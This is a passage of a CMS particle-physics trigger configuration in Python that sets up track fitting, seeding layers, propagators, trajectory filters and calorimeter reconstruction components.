cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPKFFittingSmoother = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPKFFittingSmoother\" ),\n Fitter = cms.string( \"hltESPKFTrajectoryFitter\" ),\n Smoother = cms.string( \"hltESPKFTrajectorySmoother\" ),\n EstimateCut = cms.double( -1.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPHITTRHBuilderWithoutRefit = cms.ESProducer( \"TkTransientTrackingRecHitBuilderESProducer\",\n ComponentName = cms.string( \"hltESPHITTRHBuilderWithoutRefit\" ),\n StripCPE = cms.string( \"Fake\" ),\n PixelCPE = cms.string( \"Fake\" ),\n Matcher = cms.string( \"Fake\" ),\n ComputeCoarseLocalPositionFromDisk = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" 
)\n)\nhltESPHIPixelLayerTriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPHIPixelLayerTriplets\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPHIPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltESPHIPixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0060 ),\n hitErrorRPhi = cms.double( 0.0027 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n FPix = cms.PSet( \n hitErrorRZ = cms.double( 0.0036 ),\n hitErrorRPhi = cms.double( 0.0051 ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n HitProducer = cms.string( \"hltHISiPixelRecHits\" ),\n useErrorsFromParam = cms.bool( True )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltESPFittingSmootherRK = cms.ESProducer( \"KFFittingSmootherESProducer\",\n ComponentName = cms.string( \"hltESPFittingSmootherRK\" ),\n Fitter = cms.string( \"hltESPTrajectoryFitterRK\" ),\n Smoother = cms.string( \"hltESPTrajectorySmootherRK\" ),\n EstimateCut = cms.double( -1.0 ),\n LogPixelProbabilityCut = cms.double( -16.0 ),\n MinNumberOfHits = cms.int32( 5 ),\n RejectTracks = cms.bool( True ),\n BreakTrajWith2ConsecutiveMissing = cms.bool( False ),\n NoInvalidHitsBeginEnd = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPFastSteppingHelixPropagatorOpposite = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPFastSteppingHelixPropagatorOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPFastSteppingHelixPropagatorAny = 
cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPFastSteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( True ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPEcalRegionCablingESProducer = cms.ESProducer( \"EcalRegionCablingESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n esMapping = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) )\n)\nhltESPESUnpackerWorker = cms.ESProducer( \"ESUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"hltESPESUnpackerWorker\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( LookupTable = cms.FileInPath( \"EventFilter/ESDigiToRaw/data/ES_lookup_table.dat\" ) ),\n RHAlgo = cms.PSet( \n ESRecoAlgo = cms.int32( 0 ),\n Type = cms.string( \"ESRecHitWorker\" )\n )\n)\nhltESPDummyDetLayerGeometry = cms.ESProducer( \"DetLayerGeometryESProducer\",\n ComponentName = cms.string( \"hltESPDummyDetLayerGeometry\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPCkfTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPCkfTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 5 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltESPCkfTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPCkfTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPCkfTrajectoryFilter\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPCkf3HitTrajectoryFilter = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltESPCkf3HitTrajectoryFilter\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( -1 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 
),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltESPCkf3HitTrajectoryBuilder = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltESPCkf3HitTrajectoryBuilder\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltESPCkf3HitTrajectoryFilter\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( True ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPChi2MeasurementEstimator = cms.ESProducer( \"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n MaxChi2 = cms.double( 30.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPChi2EstimatorForRefit = cms.ESProducer( \"Chi2MeasurementEstimatorESProducer\",\n ComponentName = cms.string( \"hltESPChi2EstimatorForRefit\" ),\n MaxChi2 = cms.double( 100000.0 ),\n nSigma = cms.double( 3.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltESPAnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"hltESPAnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhcalRecAlgos = cms.ESProducer( \"HcalRecAlgoESProducer\",\n SeverityLevels = cms.VPSet( \n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 0 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellCaloTowerProb' ),\n Level = cms.int32( 1 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( 'HSCP_R1R2',\n 'HSCP_FracLeader',\n 'HSCP_OuterEnergy',\n 'HSCP_ExpFit',\n 'ADCSaturationBit' ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 5 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( 'HBHEHpdHitMultiplicity',\n 'HFDigiTime',\n 'HBHEPulseShape',\n 'HOBit',\n 'HFInTimeWindow',\n 'ZDCBit',\n 'CalibrationBit',\n 'TimingErrorBit' ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 8 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( 'HFLongShort',\n 'HFS8S1Ratio',\n 'HFPET' ),\n ChannelStatus = cms.vstring( ),\n Level = cms.int32( 11 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellCaloTowerMask' ),\n Level = cms.int32( 12 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellHot' ),\n Level = cms.int32( 15 )\n ),\n cms.PSet( RecHitFlags = cms.vstring( ),\n ChannelStatus = cms.vstring( 'HcalCellOff',\n 'HcalCellDead' ),\n Level = cms.int32( 20 )\n )\n ),\n RecoveredRecHitBits = cms.vstring( 'TimingAddedBit',\n 'TimingSubtractedBit' ),\n appendToDataLabel = cms.string( \"\" ),\n DropChannelStatusBits = cms.vstring( 'HcalCellMask',\n 'HcalCellOff',\n 'HcalCellDead' )\n)\nhcalDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"HcalDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.087 ),\n nEta = cms.int32( 70 ),\n nPhi = cms.int32( 72 ),\n includeBadChambers = cms.bool( False )\n)\necalSeverityLevel = 
cms.ESProducer( \"EcalSeverityLevelESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n flagMask = cms.vuint32( 1, 114, 896, 4, 49152, 3080 ),\n dbstatusMask = cms.vuint32( 1, 2046, 0, 0, 0, 64512 ),\n timeThresh = cms.double( 2.0 )\n)\necalDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"EcalDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.02 ),\n nEta = cms.int32( 300 ),\n nPhi = cms.int32( 360 ),\n includeBadChambers = cms.bool( False )\n)\ncosmicsNavigationSchoolESProducer = cms.ESProducer( \"NavigationSchoolESProducer\",\n ComponentName = cms.string( \"CosmicNavigationSchool\" ),\n appendToDataLabel = cms.string( \"\" )\n)\ncaloDetIdAssociator = cms.ESProducer( \"DetIdAssociatorESProducer\",\n ComponentName = cms.string( \"CaloDetIdAssociator\" ),\n appendToDataLabel = cms.string( \"\" ),\n etaBinSize = cms.double( 0.087 ),\n nEta = cms.int32( 70 ),\n nPhi = cms.int32( 72 ),\n includeBadChambers = cms.bool( False )\n)\nTransientTrackBuilderESProducer = cms.ESProducer( \"TransientTrackBuilderESProducer\",\n ComponentName = cms.string( \"TransientTrackBuilder\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nSteppingHelixPropagatorAny = cms.ESProducer( \"SteppingHelixPropagatorESProducer\",\n ComponentName = cms.string( \"SteppingHelixPropagatorAny\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n useInTeslaFromMagField = cms.bool( False ),\n SetVBFPointer = cms.bool( False ),\n useMagVolumes = cms.bool( True ),\n VBFName = cms.string( \"VolumeBasedMagneticField\" ),\n ApplyRadX0Correction = cms.bool( True ),\n AssumeNoMaterial = cms.bool( False ),\n NoErrorPropagation = cms.bool( False ),\n debug = cms.bool( False ),\n useMatVolumes = cms.bool( True ),\n useIsYokeFlag = cms.bool( True ),\n returnTangentPlane = cms.bool( True ),\n sendLogWarning = cms.bool( False ),\n useTuningForL2Speed = cms.bool( False ),\n useEndcapShiftsInZ = cms.bool( False ),\n endcapShiftInZPos = cms.double( 0.0 ),\n endcapShiftInZNeg = cms.double( 0.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nOppositeMaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterialOpposite\" ),\n PropagationDirection = cms.string( \"oppositeToMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nMaterialPropagator = cms.ESProducer( \"PropagatorWithMaterialESProducer\",\n ComponentName = cms.string( \"PropagatorWithMaterial\" ),\n PropagationDirection = cms.string( \"alongMomentum\" ),\n Mass = cms.double( 0.105 ),\n MaxDPhi = cms.double( 1.6 ),\n useRungeKutta = cms.bool( False ),\n ptMin = cms.double( -1.0 ),\n appendToDataLabel = cms.string( \"\" )\n)\nEcalUnpackerWorkerESProducer = cms.ESProducer( \"EcalUnpackerWorkerESProducer\",\n ComponentName = cms.string( \"\" ),\n appendToDataLabel = cms.string( \"\" ),\n DCCDataUnpacker = cms.PSet( \n tccUnpacking = cms.bool( False ),\n orderedDCCIdList = cms.vint32( 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54 ),\n srpUnpacking = cms.bool( False ),\n syncCheck = cms.bool( False ),\n feIdCheck = cms.bool( True ),\n headerUnpacking = cms.bool( True ),\n orderedFedList = cms.vint32( 601, 602, 603, 604, 605, 606, 607, 608, 
609, 610, 611, 612, 613, 614, 615, 616, 617, 618, 619, 620, 621, 622, 623, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 634, 635, 636, 637, 638, 639, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 650, 651, 652, 653, 654 ),\n feUnpacking = cms.bool( True ),\n forceKeepFRData = cms.bool( False ),\n memUnpacking = cms.bool( True )\n ),\n ElectronicsMapper = cms.PSet( \n numbXtalTSamples = cms.uint32( 10 ),\n numbTriggerTSamples = cms.uint32( 1 )\n ),\n UncalibRHAlgo = cms.PSet( Type = cms.string( \"EcalUncalibRecHitWorkerWeights\" ) ),\n CalibRHAlgo = cms.PSet( \n flagsMapDBReco = cms.vint32( 0, 0, 0, 0, 4, -1, -1, -1, 4, 4, 7, 7, 7, 8, 9 ),\n Type = cms.string( \"EcalRecHitWorkerSimple\" ),\n killDeadChannels = cms.bool( True ),\n ChannelStatusToBeExcluded = cms.vint32( 10, 11, 12, 13, 14 ),\n laserCorrection = cms.bool( False )\n )\n)\nCaloTowerConstituentsMapBuilder = cms.ESProducer( \"CaloTowerConstituentsMapBuilder\",\n MapFile = cms.untracked.string( \"Geometry/CaloTopology/data/CaloTowerEEGeometric.map.gz\" ),\n appendToDataLabel = cms.string( \"\" )\n)\nCaloTopologyBuilder = cms.ESProducer( \"CaloTopologyBuilder\",\n appendToDataLabel = cms.string( \"\" )\n)\nAnyDirectionAnalyticalPropagator = cms.ESProducer( \"AnalyticalPropagatorESProducer\",\n ComponentName = cms.string( \"AnyDirectionAnalyticalPropagator\" ),\n PropagationDirection = cms.string( \"anyDirection\" ),\n MaxDPhi = cms.double( 1.6 ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter1ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter1ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter1ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter1SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter1ESPPixelLayerTriplets = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter1ESPPixelLayerTriplets\" ),\n layerList = cms.vstring( 
'BPix1+BPix2+BPix3',\n 'BPix1+BPix2+FPix1_pos',\n 'BPix1+BPix2+FPix1_neg',\n 'BPix1+FPix1_pos+FPix2_pos',\n 'BPix1+FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter1ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0036 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter1ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0051 )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltIter1ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter1ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter1ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter1ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter1ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter1ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.3 )\n )\n)\nhltIter2ESPMeasurementTracker = cms.ESProducer( \"MeasurementTrackerESProducer\",\n ComponentName = cms.string( \"hltIter2ESPMeasurementTracker\" ),\n PixelCPE = cms.string( \"hltESPPixelCPEGeneric\" ),\n StripCPE = cms.string( \"StripCPEfromTrackAngle\" ),\n HitMatcher = cms.string( \"StandardMatcher\" ),\n Regional = cms.bool( True ),\n OnDemand = cms.bool( True ),\n UsePixelModuleQualityDB = cms.bool( True ),\n DebugPixelModuleQualityDB = cms.untracked.bool( False ),\n UsePixelROCQualityDB = cms.bool( True ),\n DebugPixelROCQualityDB = cms.untracked.bool( False ),\n UseStripModuleQualityDB = cms.bool( True ),\n DebugStripModuleQualityDB = cms.untracked.bool( False ),\n UseStripAPVFiberQualityDB = cms.bool( True ),\n DebugStripAPVFiberQualityDB = cms.untracked.bool( False ),\n MaskBadAPVFibers = cms.bool( True ),\n UseStripStripQualityDB = cms.bool( True ),\n DebugStripStripQualityDB = cms.untracked.bool( False ),\n SiStripQualityLabel = cms.string( \"\" ),\n switchOffPixelsIfEmpty = cms.bool( True ),\n pixelClusterProducer = cms.string( \"hltSiPixelClusters\" ),\n skipClusters = cms.InputTag( \"hltIter2ClustersRefRemoval\" ),\n stripClusterProducer = cms.string( \"hltIter2SiStripClusters\" ),\n stripLazyGetterProducer = cms.string( \"hltSiStripRawToClustersFacility\" ),\n 
appendToDataLabel = cms.string( \"\" ),\n inactivePixelDetectorLabels = cms.VInputTag( ),\n inactiveStripDetectorLabels = cms.VInputTag( ),\n badStripCuts = cms.PSet( \n TID = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TOB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TEC = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n ),\n TIB = cms.PSet( \n maxConsecutiveBad = cms.uint32( 9999 ),\n maxBad = cms.uint32( 9999 )\n )\n )\n)\nhltIter2ESPPixelLayerPairs = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter2ESPPixelLayerPairs\" ),\n layerList = cms.vstring( 'BPix1+BPix2',\n 'BPix1+BPix3',\n 'BPix2+BPix3',\n 'BPix1+FPix1_pos',\n 'BPix1+FPix1_neg',\n 'BPix1+FPix2_pos',\n 'BPix1+FPix2_neg',\n 'BPix2+FPix1_pos',\n 'BPix2+FPix1_neg',\n 'BPix2+FPix2_pos',\n 'BPix2+FPix2_neg',\n 'FPix1_pos+FPix2_pos',\n 'FPix1_neg+FPix2_neg' ),\n BPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0060 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter2ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0027 )\n ),\n FPix = cms.PSet( \n HitProducer = cms.string( \"hltSiPixelRecHits\" ),\n hitErrorRZ = cms.double( 0.0036 ),\n useErrorsFromParam = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBuilderPixelOnly\" ),\n skipClusters = cms.InputTag( \"hltIter2ClustersRefRemoval\" ),\n hitErrorRPhi = cms.double( 0.0051 )\n ),\n TEC = cms.PSet( ),\n TID = cms.PSet( ),\n TIB = cms.PSet( ),\n TOB = cms.PSet( )\n)\nhltIter2ESPTrajectoryBuilderIT = cms.ESProducer( \"CkfTrajectoryBuilderESProducer\",\n ComponentName = cms.string( \"hltIter2ESPTrajectoryBuilderIT\" ),\n updator = cms.string( \"hltESPKFUpdator\" ),\n propagatorAlong = cms.string( \"PropagatorWithMaterial\" ),\n propagatorOpposite = cms.string( \"PropagatorWithMaterialOpposite\" ),\n estimator = cms.string( \"hltESPChi2MeasurementEstimator\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n MeasurementTrackerName = cms.string( \"hltIter2ESPMeasurementTracker\" ),\n trajectoryFilterName = cms.string( \"hltIter2ESPTrajectoryFilterIT\" ),\n maxCand = cms.int32( 5 ),\n lostHitPenalty = cms.double( 30.0 ),\n intermediateCleaning = cms.bool( True ),\n alwaysUseInvalidHits = cms.bool( False ),\n appendToDataLabel = cms.string( \"\" )\n)\nhltIter2ESPTrajectoryFilterIT = cms.ESProducer( \"TrajectoryFilterESProducer\",\n ComponentName = cms.string( \"hltIter2ESPTrajectoryFilterIT\" ),\n appendToDataLabel = cms.string( \"\" ),\n filterPset = cms.PSet( \n minimumNumberOfHits = cms.int32( 3 ),\n minHitsMinPt = cms.int32( 3 ),\n ComponentType = cms.string( \"CkfBaseTrajectoryFilter\" ),\n maxLostHits = cms.int32( 1 ),\n maxNumberOfHits = cms.int32( 100 ),\n maxConsecLostHits = cms.int32( 1 ),\n chargeSignificance = cms.double( -1.0 ),\n nSigmaMinPt = cms.double( 5.0 ),\n minPt = cms.double( 0.9 )\n )\n)\nhltIter3ESPLayerTripletsA = cms.ESProducer( \"SeedingLayersESProducer\",\n appendToDataLabel = cms.string( \"\" ),\n ComponentName = cms.string( \"hltIter3ESPLayerTripletsA\" ),\n layerList = cms.vstring( 'BPix1+BPix2+BPix3',\n 